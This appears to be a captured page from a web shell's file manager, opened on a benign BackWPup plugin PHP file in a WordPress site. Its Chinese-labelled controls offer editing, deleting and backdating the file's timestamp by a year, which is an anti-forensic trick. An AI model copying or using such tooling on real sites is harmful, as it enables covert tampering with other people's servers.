文件操作 - PhpNotice.php
返回文件管理
返回主菜单
删除本文件
文件: /storage/v12552/kidsonlychiropract/public_html/wp-content/plugins/backwpup/inc/Notice/PhpNotice.php
编辑文件内容
<?php namespace Inpsyde\BackWPup\Notice; use Inpsyde\EnvironmentChecker\Constraints\PhpConstraint; class PhpNotice extends EnvironmentNotice { /** * @var string */ public const OPTION_NAME = 'backwpup_notice_php_version'; /** * @var string */ public const ID = self::OPTION_NAME; /** * {@inheritdoc} */ protected function getConstraints(): array { return [ new PhpConstraint( '7.4' ), ]; } /** * {@inheritdoc} */ protected function message(): NoticeMessage { return new NoticeMessage('php'); } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件